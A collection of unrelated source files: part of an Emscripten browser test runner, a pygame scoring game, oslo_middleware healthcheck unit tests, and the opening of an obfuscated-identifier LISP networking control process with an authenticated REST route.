var actualUrl = Module.canvas.toDataURL();
var actualImage = new Image();
actualImage.onload = function() {
/*
document.body.appendChild(img); // for comparisons
var div = document.createElement('div');
div.innerHTML = '^=expected, v=actual';
document.body.appendChild(div);
document.body.appendChild(actualImage); // to grab it for creating the test reference
*/
var actualCanvas = document.createElement('canvas');
actualCanvas.width = actualImage.width;
actualCanvas.height = actualImage.height;
var actualCtx = actualCanvas.getContext('2d');
actualCtx.drawImage(actualImage, 0, 0);
var actual = actualCtx.getImageData(0, 0, actualImage.width, actualImage.height).data;
var total = 0;
var width = img.width;
var height = img.height;
for (var x = 0; x < width; x++) {
for (var y = 0; y < height; y++) {
total += Math.abs(expected[y*width*4 + x*4 + 0] - actual[y*width*4 + x*4 + 0]);
total += Math.abs(expected[y*width*4 + x*4 + 1] - actual[y*width*4 + x*4 + 1]);
total += Math.abs(expected[y*width*4 + x*4 + 2] - actual[y*width*4 + x*4 + 2]);
}
}
var wrong = Math.floor(total / (img.width*img.height*3)); // floor, to allow some margin of error for antialiasing
// If the main JS file is in a worker, or modularize, then we need to supply our own reporting logic.
if (typeof reportResultToServer === 'undefined') {
(function() {
%s
reportResultToServer(wrong);
})();
} else {
reportResultToServer(wrong);
}
};
actualImage.src = actualUrl;
}
img.src = '%s';
};
// Automatically trigger the reftest?
if (!%s) {
// Yes, automatically
Module['postRun'] = doReftest;
if (typeof WebGLClient !== 'undefined') {
// trigger reftest from RAF as well, needed for workers where there is no pre|postRun on the main thread
var realRAF = window.requestAnimationFrame;
window.requestAnimationFrame = /** @suppress{checkTypes} */ (function(func) {
realRAF(function() {
func();
realRAF(doReftest);
});
});
// trigger reftest from canvas render too, for workers not doing GL
var realWOM = worker.onmessage;
worker.onmessage = function(event) {
realWOM(event);
if (event.data.target === 'canvas' && event.data.op === 'render') {
realRAF(doReftest);
}
};
}
} else {
// Manually trigger the reftest.
// The user will call it.
// Add an event loop iteration to ensure rendering, so users don't need to bother.
var realDoReftest = doReftest;
doReftest = function() {
setTimeout(realDoReftest, 1);
};
}
''' % (reporting.read(), basename, int(manually_trigger)))
def compile_btest(self, args, reporting=Reporting.FULL):
# Inject support code for reporting results. This adds an include a header so testcases can
# use REPORT_RESULT, and also adds a cpp file to be compiled alongside the testcase, which
# contains the implementation of REPORT_RESULT (we can't just include that implementation in
# the header as there may be multiple files being compiled here).
args += ['-s', 'IN_TEST_HARNESS']
if reporting != Reporting.NONE:
# For basic reporting we inject JS helper funtions to report result back to server.
args += ['-DEMTEST_PORT_NUMBER=%d' % self.port,
'--pre-js', test_file('browser_reporting.js')]
if reporting == Reporting.FULL:
# If C reporting (i.e. REPORT_RESULT macro) is required
# also compile in report_result.cpp and forice-include report_result.h
args += ['-I', path_from_root('tests'),
'-include', test_file('report_result.h'),
test_file('report_result.cpp')]
self.run_process([EMCC] + self.get_emcc_args() + args)
def btest_exit(self, filename, assert_returncode=0, *args, **kwargs):
"""Special case of btest that reports its result solely via exiting
with a give result code.
In this case we set EXIT_RUNTIME and we don't need to provide the
REPORT_RESULT macro to the C code.
"""
self.set_setting('EXIT_RUNTIME')
kwargs['reporting'] = Reporting.JS_ONLY
kwargs['expected'] = 'exit:%d' % assert_returncode
return self.btest(filename, *args, **kwargs)
def btest(self, filename, expected=None, reference=None,
reference_slack=0, manual_reference=False, post_build=None,
args=None, message='.', also_proxied=False,
url_suffix='', timeout=None, also_asmjs=False,
manually_trigger_reftest=False, extra_tries=1,
reporting=Reporting.FULL):
assert expected or reference, 'a btest must either expect an output, or have a reference image'
if args is None:
args = []
original_args = args[:]
if not os.path.exists(filename):
filename = test_file(filename)
if reference:
self.reference = reference
expected = [str(i) for i in range(0, reference_slack + 1)]
self.reftest(test_file(reference), manually_trigger=manually_trigger_reftest)
if not manual_reference:
args += ['--pre-js', 'reftest.js', '-s', 'GL_TESTING']
outfile = 'test.html'
args += [filename, '-o', outfile]
# print('all args:', args)
try_delete(outfile)
self.compile_btest(args, reporting=reporting)
self.assertExists(outfile)
if post_build:
post_build()
if not isinstance(expected, list):
expected = [expected]
self.run_browser(outfile + url_suffix, message, ['/report_result?' + e for e in expected], timeout=timeout, extra_tries=extra_tries)
# Tests can opt into being run under asmjs as well
if 'WASM=0' not in original_args and (also_asmjs or self.also_asmjs):
print('WASM=0')
self.btest(filename, expected, reference, reference_slack, manual_reference, post_build,
original_args + ['-s', 'WASM=0'], message, also_proxied=False, timeout=timeout)
if also_proxied:
print('proxied...')
if reference:
assert not manual_reference
manual_reference = True
assert not post_build
post_build = self.post_manual_reftest
# run proxied
self.btest(filename, expected, reference, reference_slack, manual_reference, post_build,
original_args + ['--proxy-to-worker', '-s', 'GL_TESTING'], message, timeout=timeout)
###################################################################################################
def build_library(name,
build_dir,
output_dir,
generated_libs,
configure=['sh', './configure'],
make=['make'],
make_args=[],
cache=None,
cache_name=None,
env_init={},
native=False,
cflags=[]):
"""Build a library and cache the result. We build the library file
once and cache it for all our tests. (We cache in memory since the test
directory is destroyed and recreated for each test. Note that we cache
separately for different compilers). This cache is just during the test
runner. There is a different concept of caching as well, see |Cache|.
"""
if type(generated_libs) is not list:
generated_libs = [generated_libs]
source_dir = test_file(name.replace('_native', ''))
project_dir = os.path.join(build_dir, name)
if os.path.exists(project_dir):
shutil.rmtree(project_dir)
shutil.copytree(source_dir, project_dir) # Useful in debugging sometimes to comment this out, and two lines above
generated_libs = [os.path.join(project_dir, lib) for lib in generated_libs]
if native:
env = clang_native.get_clang_native_env()
else:
env = building.get_building_env(cflags=cflags)
for k, v in env_init.items():
env[k] = v
if configure:
if configure[0] == 'cmake':
configure = [EMCMAKE] + configure
else:
configure = [EMCONFIGURE] + configure
try:
with open(os.path.join(project_dir, 'configure_out'), 'w') as out:
with open(os.path.join(project_dir, 'configure_err'), 'w') as err:
stdout = out if EM_BUILD_VERBOSE < 2 else None
stderr = err if EM_BUILD_VERBOSE < 1 else None
shared.run_process(configure, env=env, stdout=stdout, stderr=stderr,
cwd=project_dir)
except subprocess.CalledProcessError:
with open(os.path.join(project_dir, 'configure_out')) as f:
print('-- configure stdout --')
print(f.read())
print('-- end configure stdout --')
with open(os.path.join(project_dir, 'configure_err')) as f:
print('-- configure stderr --')
print(f.read())
print('-- end configure stderr --')
raise
def open_make_out(mode='r'):
return open(os.path.join(project_dir, 'make.out'), mode)
def open_make_err(mode='r'):
return open(os.path.join(project_dir, 'make.err'), mode)
if EM_BUILD_VERBOSE >= 3:
make_args += ['VERBOSE=1']
try:
with open_make_out('w') as make_out:
with open_make_err('w') as make_err:
stdout = make_out if EM_BUILD_VERBOSE < 2 else None
stderr = make_err if EM_BUILD_VERBOSE < 1 else None
shared.run_process(make + make_args, stdout=stdout, stderr=stderr, env=env,
cwd=project_dir)
except subprocess.CalledProcessError:
with open_make_out() as f:
print('-- make stdout --')
print(f.read())
print('-- end make stdout --')
with open_make_err() as f:
print('-- make stderr --')
print(f.read())
print('-- end stderr --')
raise
if cache is not None:
cache[cache_name] = []
for f in generated_libs:
basename = os.path.basename(f)
cache[cache_name].append((basename, open(f, 'rb').read()))
return generated_libs
def check_js_engines():
working_engines = list(filter(jsrun.check_engine, config.JS_ENGINES))
if len(working_engines) < len(config.JS_ENGINES):
print('Not all the JS engines in JS_ENGINES appears to work.')
exit(1)
if EMTEST_ALL_ENGINES:
print('(using ALL js engines)')
else:
logger.warning('use EMTEST_ALL_ENGINES=1 in the env to run against all JS '
'engines, which is slower but provides more coverage')
def get_and_import_modules():
modules = []
for filename in glob.glob(os.path.join(os.path.dirname(__file__), 'test*.py')):
module_dir, module_file = os.path.split(filename)
module_name, module_ext = os.path.splitext(module_file)
__import__(module_name)
modules.append(sys.modules[module_name])
return modules
def get_all_tests(modules):
# Create a list of all known tests so that we can choose from them based on a wildcard search
all_tests = []
suites = core_test_modes + non_core_test_modes
for m in modules:
for s in suites:
if hasattr(m, s):
tests = [t for t in dir(getattr(m, s)) if t.startswith('test_')]
all_tests += [s + '.' + t for t in tests]
return all_tests
def tests_with_expanded_wildcards(args, all_tests):
# Process wildcards, e.g. "browser.test_pthread_*" should expand to list all pthread tests
new_args = []
for i, arg in enumerate(args):
if '*' in arg:
if arg.startswith('skip:'):
arg = arg[5:]
matching_tests = fnmatch.filter(all_tests, arg)
new_args += ['skip:' + t for t in matching_tests]
else:
new_args += fnmatch.filter(all_tests, arg)
else:
new_args += [arg]
if not new_args and args:
print('No tests found to run in set: ' + str(args))
sys.exit(1)
return new_args
def skip_requested_tests(args, modules):
for i, arg in enumerate(args):
if arg.startswith('skip:'):
which = [arg.split('skip:')[1]]
print(','.join(which), file=sys.stderr)
skipped = False
for test in which:
print('will skip "%s"' % test, file=sys.stderr)
suite_name, test_name = test.split('.')
for m in modules:
suite = getattr(m, suite_name, None)
if suite:
setattr(suite, test_name, lambda s: s.skipTest("requested to be skipped"))
skipped = True
break
assert skipped, "Not able to skip test " + test
args[i] = None
return [a for a in args if a is not None]
def args_for_random_tests(args, modules):
if not args:
return args
first = args[0]
if first.startswith('random'):
random_arg = first[6:]
num_tests, base_module, relevant_modes = get_random_test_parameters(random_arg)
for m in modules:
if hasattr(m, base_module):
base = getattr(m, base_module)
new_args = choose_random_tests(base, num_tests, relevant_modes)
print_random_test_statistics(num_tests)
return new_args
return args
def get_random_test_parameters(arg):
num_tests = 1
base_module = default_core_test_mode
relevant_modes = core_test_modes
if len(arg):
num_str = arg
if arg.startswith('other'):
base_module = 'other'
relevant_modes = ['other']
num_str = arg.replace('other', '')
elif arg.startswith('browser'):
base_module = 'browser'
relevant_modes = ['browser']
num_str = arg.replace('browser', '')
num_tests = int(num_str)
return num_tests, base_module, relevant_modes
def choose_random_tests(base, num_tests, relevant_modes):
tests = [t for t in dir(base) if t.startswith('test_')]
print()
chosen = set()
while len(chosen) < num_tests:
test = random.choice(tests)
mode = random.choice(relevant_modes)
new_test = mode + '.' + test
before = len(chosen)
chosen.add(new_test)
if len(chosen) > before:
print('* ' + new_test)
else:
# we may have hit the limit
if len(chosen) == len(tests) * len(relevant_modes):
print('(all possible tests chosen! %d = %d*%d)' % (len(chosen), len(tests), len(relevant_modes)))
break
return list(chosen)
def print_random_test_statistics(num_tests):
std = 0.5 / math.sqrt(num_tests)
expected = 100.0 * (1.0 - std)
print()
print('running those %d randomly-selected tests. if they all pass, then there is a '
'greater than 95%% chance that at least %.2f%% of the test suite will pass'
% (num_tests, expected))
print()
def show():
print('if all tests passed then there is a greater than 95%% chance that at least '
'%.2f%% of the test suite will pass'
% (expected))
atexit.register(show)
def load_test_suites(args, modules):
loader = unittest.TestLoader()
unmatched_test_names = set(args)
suites = []
for m in modules:
names_in_module = []
for name in list(unmatched_test_names):
try:
operator.attrgetter(name)(m)
names_in_module.append(name)
unmatched_test_names.remove(name)
except AttributeError:
pass
if len(names_in_module):
loaded_tests = loader.loadTestsFromNames(sorted(names_in_module), m)
tests = flattened_tests(loaded_tests)
suite = suite_for_module(m, tests)
for test in tests:
suite.addTest(test)
suites.append((m.__name__, suite))
return suites, unmatched_test_names
def flattened_tests(loaded_tests):
tests = []
for subsuite in loaded_tests:
for test in subsuite:
tests.append(test)
return tests
def suite_for_module(module, tests):
suite_supported = module.__name__ in ('test_core', 'test_other', 'test_posixtest')
if not EMTEST_SAVE_DIR and not DEBUG:
has_multiple_tests = len(tests) > 1
has_multiple_cores = parallel_testsuite.num_cores() > 1
if suite_supported and has_multiple_tests and has_multiple_cores:
return parallel_testsuite.ParallelTestSuite(len(tests))
return unittest.TestSuite()
def run_tests(options, suites):
resultMessages = []
num_failures = 0
print('Test suites:')
print([s[0] for s in suites])
# Run the discovered tests
testRunner = unittest.TextTestRunner(verbosity=2)
for mod_name, suite in suites:
print('Running %s: (%s tests)' % (mod_name, suite.countTestCases()))
res = testRunner.run(suite)
msg = ('%s: %s run, %s errors, %s failures, %s skipped' %
(mod_name, res.testsRun, len(res.errors), len(res.failures), len(res.skipped)))
num_failures += len(res.errors) + len(res.failures)
resultMessages.append(msg)
if len(resultMessages) > 1:
print('====================')
print()
print('TEST SUMMARY')
for msg in resultMessages:
print(' ' + msg)
# Return the number of failures as the process exit code for automating success/failure reporting.
return min(num_failures, 255)
def parse_args(args):
parser = argparse.ArgumentParser(prog='runner.py', description=__doc__)
parser.add_argument('tests', nargs='*')
return parser.parse_args()
def main(args):
options = parse_args(args)
check_js_engines()
def prepend_default(arg):
if arg.startswith('test_'):
return default_core_test_mode + '.' + arg
return arg
tests = [prepend_default(t) for t in options.tests]
modules = get_and_import_modules()
all_tests = get_all_tests(modules)
tests = tests_with_expanded_wildcards(tests, all_tests)
tests = skip_requested_tests(tests, modules)
tests = args_for_random_tests(tests, modules)
suites, unmatched_tests = load_test_suites(tests, modules)
if unmatched_tests:
print('ERROR: could not find the following tests: ' + ' '.join(unmatched_tests))
return 1
return run_tests(options, suites)
if __name__ == '__main__':
try:
sys.exit(main(sys.argv))
except KeyboardInterrupt:
logger.warning('KeyboardInterrupt')
sys.exit(1)
|
game.py
|
import logging
import pygame as pg
from datetime import datetime
import g_var
from keyboard import Keyboard
from frame import Frame
from record import Record
from utils import rm, upload_ig, get_layout_imgs, load_all_imgs, load_all_walls
from constant import game_settings
from stage import (
WelcomeStage,
ScanStage,
LoadingStage,
ConfirmStage,
IntroStage,
Level,
Rank,
)
logging.basicConfig(level=logging.INFO, format='%(asctime)-15s:%(levelname)s:%(name)s:%(message)s')
logger = logging.getLogger(__name__)
class Stages:
def __init__(self, states, stages):
self._states = states
self._stages = stages
self.state_idx = 0
pass
@property
def num_states(self):
return len(self._states)
@property
def state(self):
return self._states[self.state_idx]
@property
def stage(self):
return self._stages[self.state]
def change_stage(self):
if self.num_states == 0:
return
self.state_idx += 1
self.state_idx %= self.num_states
class Game(Stages):
def __init__(self, player_name):
rm(player_name)
self.record = None
self.player_name = player_name
self.bg_frames = Frame(g_var.surface, get_layout_imgs('bg'))
self.bar_frames = Frame(g_var.surface, get_layout_imgs('bar'))
super().__init__(
states=[
'welcome',
'scan',
'loading',
'confirm',
'intro1',
'level1',
'intro2',
'level2',
'intro3',
'level3',
'rank',
],
stages={
'welcome': WelcomeStage(),
'scan': ScanStage(player_name),
'loading': LoadingStage(player_name),
'confirm': ConfirmStage(player_name),
'intro1': IntroStage('intro1'),
'level1': Level('level1', player_name),
'intro2': IntroStage('intro2'),
'level2': Level('level2', player_name),
'intro3': IntroStage('intro3'),
'level3': Level('level3', player_name),
'rank': Rank(player_name),
},
)
@property
def is_playing_stage(self):
return 'level' in self.state or 'intro' in self.state
def tick(self, keyboard):
logger.info('Game tick')
self.bg_frames.tick()
if not self.is_playing_stage:
self.bar_frames.tick()
status = self.stage.tick(keyboard)
if status:
if 'welcome' == self.state:
g_var.player_score = game_settings['starting_scores']
elif 'level' in self.state:
g_var.player_score -= len(self.stage.viewbox.house.connection.connects)
if 'level3' == self.state:
rec = {
'name': self.player_name,
'score': g_var.player_score,
'datetime': datetime.now().strftime('%Y-%m-%d %H:%M:%S'),
}
rec['caption'] = '{} \n{} score: {}'.format(
rec['datetime'], rec['name'], rec['score'])
self.record = rec
upload_ig(rec['name'], rec['caption'])
elif 'rank' == self.state:
return True
self.change_stage()
g_var.screen.blit(g_var.surface, (0, 0))
return False
class RankGame:
def __init__(self, is_ready=False):
self._game = None
self._keyboard = None
self.is_ready = is_ready
self.bg_frames = Frame(g_var.surface, get_layout_imgs('bg'))
self.ball_frames = Frame(g_var.surface, get_layout_imgs('loading/ball'))
self.bar_frames = Frame(g_var.surface, get_layout_imgs('bar'))
@property
def player_idx(self):
return len(g_var.records.df) + game_settings['start_player_idx']
@property
def player_name(self):
return 'Player-{:03d}'.format(self.player_idx)
@property
def game(self):
if self._game is None:
self._game = Game(self.player_name)
return self._game
@property
def keyboard(self):
if self._keyboard is None:
self._keyboard = Keyboard()
return self._keyboard
def tick(self, keyboard):
# logger.info('RankGame tick')
if not self.is_ready:
self.bg_frames.tick()
self.ball_frames.tick()
self.bar_frames.tick()
return
status = self.game.tick(keyboard)
if status:
logger.info('record {}'.format(self.game.record))
g_var.records.add(self.game.record)
g_var.player_idx = self.player_idx
self._game = None
def start(self):
while True:
# get pygame events
events = pg.event.get()
logger.debug('events: {}'.format(events))
# update keyboard
self.keyboard.update(events)
logger.debug('keyboard: {}'.format(self.keyboard.keys))
# exit while player close the pygame display window
if any([e.type == pg.QUIT for e in events]):
break
# exit while player click esc
if self.keyboard.is_pressed(pg.K_ESCAPE):
break
# tick
self.tick(self.keyboard)
# refresh pygame display
pg.display.flip()
# delay 1/frame_rate time by pygame clock
g_var.pg_clock.tick(game_settings['frame_rate'])
def init(rank_game):
# load_all_imgs first while init
load_all_imgs()
load_all_walls()
rank_game.is_ready = True
def main():
# init pygame
pg.init()
pg.display.set_caption(game_settings['game_title'])
# init pygame screen
# display_flags = pg.DOUBLEBUF | pg.RESIZABLE
display_flags = pg.FULLSCREEN | pg.HWSURFACE | pg.DOUBLEBUF | pg.RESIZABLE
g_var.screen = pg.display.set_mode(tuple(game_settings['screen_size']), display_flags)
# init pygame surface
surface_flags = pg.HWACCEL | pg.HWSURFACE
g_var.surface = pg.Surface(g_var.screen.get_size(), flags=surface_flags).convert()
# init pygame clock
g_var.pg_clock = pg.time.Clock()
# init player_score
g_var.player_score = game_settings['starting_scores']
# init records
g_var.records = Record()
# init player_idx
g_var.player_idx = game_settings['start_player_idx']
# init RankGame
rank_game = RankGame()
# TODO: create a thread to load images
# init_thread = threading.Thread(target=init, args=[rank_game, pg])
# init_thread.start()
init(rank_game)
# run rank game
rank_game.start()
# quit pygame
pg.quit()
if __name__ == "__main__":
main()
|
test_healthcheck.py
|
# Copyright (c) 2013 NEC Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import threading
import time
import mock
from oslo_config import fixture as config
from oslotest import base as test_base
import requests
import webob.dec
import webob.exc
from oslo_middleware import healthcheck
from oslo_middleware.healthcheck import __main__
class HealthcheckMainTests(test_base.BaseTestCase):
def test_startup_response(self):
server = __main__.create_server(0)
th = threading.Thread(target=server.serve_forever)
th.start()
self.addCleanup(server.shutdown)
while True:
try:
# Connecting on 0.0.0.0 is not allowed on windows
# The operating system will return WSAEADDRNOTAVAIL which
# in turn will throw a requests.ConnectionError
r = requests.get("http://127.0.0.1:%s" % (
server.server_address[1]))
except requests.ConnectionError:
# Server hasn't started up yet, try again in a few.
time.sleep(1)
else:
self.assertEqual(200, r.status_code)
break
class HealthcheckTests(test_base.BaseTestCase):
def setUp(self):
super(HealthcheckTests, self).setUp()
self.useFixture(config.Config())
@staticmethod
@webob.dec.wsgify
def application(req):
return 'Hello, World!!!'
def _do_test_request(self, conf={}, path='/healthcheck',
accept='text/plain', method='GET',
server_port=80):
self.app = healthcheck.Healthcheck(self.application, conf)
req = webob.Request.blank(path, accept=accept, method=method)
req.server_port = server_port
res = req.get_response(self.app)
return res
def _do_test(self, conf={}, path='/healthcheck',
expected_code=webob.exc.HTTPOk.code,
expected_body=b'', accept='text/plain',
method='GET', server_port=80):
res = self._do_test_request(conf=conf, path=path,
accept=accept, method=method,
server_port=server_port)
self.assertEqual(expected_code, res.status_int)
self.assertEqual(expected_body, res.body)
def test_default_path_match(self):
self._do_test()
def test_default_path_not_match(self):
self._do_test(path='/toto', expected_body=b'Hello, World!!!')
def test_configured_path_match(self):
conf = {'path': '/hidden_healthcheck'}
self._do_test(conf, path='/hidden_healthcheck')
def test_configured_path_not_match(self):
conf = {'path': '/hidden_healthcheck'}
self._do_test(conf, path='/toto', expected_body=b'Hello, World!!!')
@mock.patch('oslo_middleware.healthcheck.disable_by_file.LOG')
def test_disablefile_unconfigured(self, fake_log):
fake_warn = fake_log.warning
conf = {'backends': 'disable_by_file'}
self._do_test(conf, expected_body=b'OK')
self.assertIn('disable_by_file', self.app._backends.names())
fake_warn.assert_called_once_with(
'DisableByFile healthcheck middleware '
'enabled without disable_by_file_path '
'set'
)
def test_disablefile_enabled(self):
conf = {'backends': 'disable_by_file',
'disable_by_file_path': '/foobar'}
self._do_test(conf, expected_body=b'OK')
self.assertIn('disable_by_file', self.app._backends.names())
def test_disablefile_enabled_head(self):
conf = {'backends': 'disable_by_file',
'disable_by_file_path': '/foobar'}
self._do_test(conf, expected_body=b'', method='HEAD',
expected_code=webob.exc.HTTPNoContent.code)
def test_disablefile_enabled_html_detailed(self):
conf = {'backends': 'disable_by_file',
'disable_by_file_path': '/foobar', 'detailed': True}
res = self._do_test_request(conf, accept="text/html")
self.assertIn(b'Result of 1 checks:', res.body)
self.assertIn(b'<TD>OK</TD>', res.body)
self.assertEqual(webob.exc.HTTPOk.code, res.status_int)
def test_disablefile_disabled(self):
filename = self.create_tempfiles([('test', 'foobar')])[0]
conf = {'backends': 'disable_by_file',
'disable_by_file_path': filename}
self._do_test(conf,
expected_code=webob.exc.HTTPServiceUnavailable.code,
expected_body=b'DISABLED BY FILE')
self.assertIn('disable_by_file', self.app._backends.names())
def test_disablefile_disabled_head(self):
filename = self.create_tempfiles([('test', 'foobar')])[0]
conf = {'backends': 'disable_by_file',
'disable_by_file_path': filename}
self._do_test(conf,
expected_code=webob.exc.HTTPServiceUnavailable.code,
expected_body=b'', method='HEAD')
self.assertIn('disable_by_file', self.app._backends.names())
def test_disablefile_disabled_html_detailed(self):
filename = self.create_tempfiles([('test', 'foobar')])[0]
conf = {'backends': 'disable_by_file',
'disable_by_file_path': filename, 'detailed': True}
res = self._do_test_request(conf, accept="text/html")
self.assertIn(b'<TD>DISABLED BY FILE</TD>', res.body)
self.assertEqual(webob.exc.HTTPServiceUnavailable.code,
res.status_int)
def test_two_backends(self):
filename = self.create_tempfiles([('test', 'foobar')])[0]
conf = {'backends': 'disable_by_file,disable_by_file',
'disable_by_file_path': filename}
self._do_test(conf,
expected_code=webob.exc.HTTPServiceUnavailable.code,
expected_body=b'DISABLED BY FILE\nDISABLED BY FILE')
self.assertIn('disable_by_file', self.app._backends.names())
def test_disable_by_port_file(self):
filename = self.create_tempfiles([('test', 'foobar')])[0]
conf = {'backends': 'disable_by_files_ports',
'disable_by_file_paths': "80:%s" % filename}
self._do_test(conf,
expected_code=webob.exc.HTTPServiceUnavailable.code,
expected_body=b'DISABLED BY FILE')
self.assertIn('disable_by_files_ports', self.app._backends.names())
def test_no_disable_by_port_file(self):
filename = self.create_tempfiles([('test', 'foobar')])[0]
conf = {'backends': 'disable_by_files_ports',
'disable_by_file_paths': "8000:%s" % filename}
self._do_test(conf,
expected_code=webob.exc.HTTPOk.code,
expected_body=b'OK')
self.assertIn('disable_by_files_ports', self.app._backends.names())
def test_disable_by_port_many_files(self):
filename = self.create_tempfiles([('test', 'foobar')])[0]
filename2 = self.create_tempfiles([('test2', 'foobar2')])[0]
conf = {'backends': 'disable_by_files_ports',
'disable_by_file_paths': "80:%s,81:%s" % (filename, filename2)}
self._do_test(conf,
expected_code=webob.exc.HTTPServiceUnavailable.code,
expected_body=b'DISABLED BY FILE')
self._do_test(conf,
expected_code=webob.exc.HTTPServiceUnavailable.code,
expected_body=b'DISABLED BY FILE',
server_port=81)
self.assertIn('disable_by_files_ports', self.app._backends.names())
|
lisp-core.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-core.py
#
# This is the core process that is used to demux to the specific LISP
# functional components. The 4342 listen socket is centralized here.
#
#
# +------------- data encapsulation via network --------------+
# | |
# | IPC when mr & ms colocated |
# | +--------------------------------+ |
# | | | |
# | | IPC when mr & ddt colo | |
# | | +------------+ | |
# | | | | | |
# | | | v v v 4341
# +-------------+ +----------+ +----------+ +----------+ +----------+
# | lisp-[ir]tr | | lisp-mr | | lisp-ddt | | lisp-ms | | lisp-etr |
# +-------------+ +----------+ +----------+ +----------+ +----------+
# ^ IPC ^ IPC ^ IPC ^ IPC ^ IPC
# | | | | |
# | | | | |
# | | | | |
# +--------------+--------------+--------------+--------------+
# |
# | for dispatching control messages
# +-----------+
# | lisp-core |
# +-----------+
# | 4342
# |
# via network
#
# -----------------------------------------------------------------------------
if 64 - 64: i11iIiiIii
import lisp
import lispconfig
import multiprocessing
import threading
import commands
import time
import os
import bottle
from cherrypy import wsgiserver
from cherrypy . wsgiserver . ssl_pyopenssl import pyOpenSSLAdapter
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
import json
import sys
import socket
import thread
if 73 - 73: II111iiii
if 22 - 22: I1IiiI * Oo0Ooo / OoO0O00 . OoOoOO00 . o0oOOo0O0Ooo / I1ii11iIi11i
if 48 - 48: oO0o / OOooOOo / I11i / Ii1I
if 48 - 48: iII111i % IiII + I1Ii111 / ooOoO0o * Ii1I
if 46 - 46: ooOoO0o * I11i - OoooooooOO
if 30 - 30: o0oOOo0O0Ooo - O0 % o0oOOo0O0Ooo - OoooooooOO * O0 * OoooooooOO
Oo0o = ""
if 60 - 60: I1ii11iIi11i + I1Ii111 - I11i / i1IIi
Ii1iI = None
Oo = None
I1Ii11I1Ii1i = None
Ooo = [ None , None , None ]
o0oOoO00o = None
if 43 - 43: Ii1I . oO0o
if 27 - 27: OoO0O00 - O0 . I1Ii111 * iII111i - I1ii11iIi11i
if 15 - 15: I1IiiI
if 90 - 90: IiII * i1IIi / Ii1I . OoO0O00 * oO0o
if 16 - 16: ooOoO0o * IiII % I11i . I1Ii111 / IiII % iII111i
if 27 - 27: IiII . i1IIi * OoOoOO00 % Ii1I / i1IIi
if 3 - 3: IiII / ooOoO0o
if 28 - 28: ooOoO0o + I1Ii111 - ooOoO0o . OoooooooOO
@ bottle . route ( '/lisp/api' , method = "get" )
@ bottle . route ( '/lisp/api/<command>' , method = "get" )
@ bottle . route ( '/lisp/api/<command>/<data_structure>' , method = "get" )
def oO0 ( command = "" , data_structure = "" ) :
IIIi1i1I = [ { "?" : [ { "?" : "not-auth" } ] } ]
if 72 - 72: Oo0Ooo % OOooOOo . I1IiiI / I11i * I1IiiI
if 31 - 31: II111iiii + OoO0O00 . I1Ii111
if 68 - 68: I1IiiI - i11iIiiIii - OoO0O00 / OOooOOo - OoO0O00 + i1IIi
if 48 - 48: OoooooooOO % o0oOOo0O0Ooo . I1IiiI - Ii1I % i1IIi % OoooooooOO
if ( bottle . request . auth != None ) :
i1iIIi1 , ii11iIi1I = bottle . request . auth
if ( lispconfig . lisp_find_user_account ( i1iIIi1 , ii11iIi1I ) == False ) :
return ( json . dumps ( IIIi1i1I ) )
if 6 - 6: OoOoOO00 * iII111i
else :
if ( bottle . request . headers [ "User-Agent" ] . find ( "python" ) != - 1 ) :
return ( json . dumps ( IIIi1i1I ) )
if 67 - 67: ooOoO0o - oO0o * o0oOOo0O0Ooo % o0oOOo0O0Ooo % I11i * OoOoOO00
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( json . dumps ( IIIi1i1I ) )
if 26 - 26: Ii1I - o0oOOo0O0Ooo
if 63 - 63: II111iiii . II111iiii
if 32 - 32: i1IIi . I11i % OoO0O00 . o0oOOo0O0Ooo
if 42 - 42: I1Ii111 + I1ii11iIi11i
if 70 - 70: Oo0Ooo % Oo0Ooo . IiII % OoO0O00 * o0oOOo0O0Ooo % oO0o
if 23 - 23: i11iIiiIii + I1IiiI
if 68 - 68: OoOoOO00 . oO0o . i11iIiiIii
if ( command == "data" and data_structure != "" ) :
II = bottle . request . body . readline ( )
IIIi1i1I = json . loads ( II ) if II != "" else ""
if ( IIIi1i1I != "" ) : IIIi1i1I = IIIi1i1I . values ( ) [ 0 ]
if ( IIIi1i1I == [ ] ) : IIIi1i1I = ""
if 14 - 14: Oo0Ooo . I1IiiI / Ii1I
if ( type ( IIIi1i1I ) == dict and type ( IIIi1i1I . values ( ) [ 0 ] ) == dict ) :
IIIi1i1I = IIIi1i1I . values ( ) [ 0 ]
if 38 - 38: II111iiii % i11iIiiIii . ooOoO0o - OOooOOo + Ii1I
if 66 - 66: OoooooooOO * OoooooooOO . OOooOOo . i1IIi - OOooOOo
IIIi1i1I = o0o00ooo0 ( data_structure , IIIi1i1I )
return ( IIIi1i1I )
if 96 - 96: O0 % oO0o % iIii1I11I1II1
if 78 - 78: iIii1I11I1II1 - Ii1I * OoO0O00 + o0oOOo0O0Ooo + iII111i + iII111i
if 11 - 11: iII111i - OoO0O00 % ooOoO0o % iII111i / OoOoOO00 - OoO0O00
if 74 - 74: iII111i * O0
if 89 - 89: oO0o + Oo0Ooo
if ( command != "" ) :
command = "lisp " + command
else :
II = bottle . request . body . readline ( )
if ( II == "" ) :
IIIi1i1I = [ { "?" : [ { "?" : "no-body" } ] } ]
return ( json . dumps ( IIIi1i1I ) )
if 3 - 3: i1IIi / I1IiiI % I11i * i11iIiiIii / O0 * I11i
if 49 - 49: oO0o % Ii1I + i1IIi . I1IiiI % I1ii11iIi11i
IIIi1i1I = json . loads ( II )
command = IIIi1i1I . keys ( ) [ 0 ]
if 48 - 48: I11i + I11i / II111iiii / iIii1I11I1II1
if 20 - 20: o0oOOo0O0Ooo
